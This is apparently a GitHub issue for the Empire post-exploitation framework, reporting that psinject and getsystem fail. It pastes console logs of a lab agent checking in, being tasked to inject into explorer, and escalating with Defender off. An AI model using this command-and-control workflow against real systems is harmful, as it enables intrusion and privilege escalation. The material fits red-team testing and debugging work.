search

EmpireProject / Empire

Empire is a PowerShell and Python post-exploitation agent.
http://www.powershellempire.com/
BSD 3-Clause "New" or "Revised" License
7.36k stars 2.8k forks source link

Process injection(psinject not working) #1340

Open CptOfEvilMinions opened 5 years ago

CptOfEvilMinions commented 5 years ago

Empire Version

OS Information (Linux flavor, Python version)

Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

Empire agent running as Administrator cannot inject into another process with psinject. Furthermore, if I try to obtain SYSTEM it fails as well.

Screenshot of error, embedded text output, or Pastebin link to the error

Process injection

(Empire: stager/multi/launcher) > [*] Sending POWERSHELL stager (stage 1) to 192.168.228.131
[*] New agent 5HA8W4T6 checked in
[+] Initial agent 5HA8W4T6 from 192.168.228.131 now active (Slack)
[*] Sending agent (stage 2) to 5HA8W4T6 at 192.168.228.131

(Empire: stager/multi/launcher) > agents

[*] Active agents:

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------
 5HA8W4T6 ps 192.168.228.131 DESKTOP-P8PBRLM   *DESKTOP-P8PBRLM\Sherlo powershell         5768   5/0.0    2019-03-27 12:59:11

(Empire: agents) > interact 5HA8W4T6
(Empire: 5HA8W4T6) > psinject http80 explorer
\[*] Tasked 5HA8W4T6 to run TASK_CMD_JOB
[*] Agent 5HA8W4T6 tasked with task ID 1
[*] Tasked agent 5HA8W4T6 to run module powershell/management/psinject
(Empire: 5HA8W4T6) > [*] Agent 5HA8W4T6 returned results.
Job started: H6F8Y4
[*] Valid results returned by 192.168.228.131
(Empire: 5HA8W4T6) >

Get-System

(Empire: 5HA8W4T6) > usemodule privesc/getsystem*
(Empire: powershell/privesc/getsystem) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 5HA8W4T6 to run TASK_CMD_WAIT
[*] Agent 5HA8W4T6 tasked with task ID 2
[*] Tasked agent 5HA8W4T6 to run module powershell/privesc/getsystem
(Empire: powershell/privesc/getsystem) > [*] Agent 5HA8W4T6 returned results.
error running command: Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
[*] Valid results returned by 192.168.228.131

(Empire: powershell/privesc/getsystem) >

Any additional information

Empire HTTP listener - no encryption Defender is turned off on Windows

Started a Powershell instance as Administrator to execute the Empire multi/launcher payload.

CptOfEvilMinions commented 5 years ago

Fixed in 3.0-Beta branch(883ee661d1bbc72920102054e8bba00515bff9e0)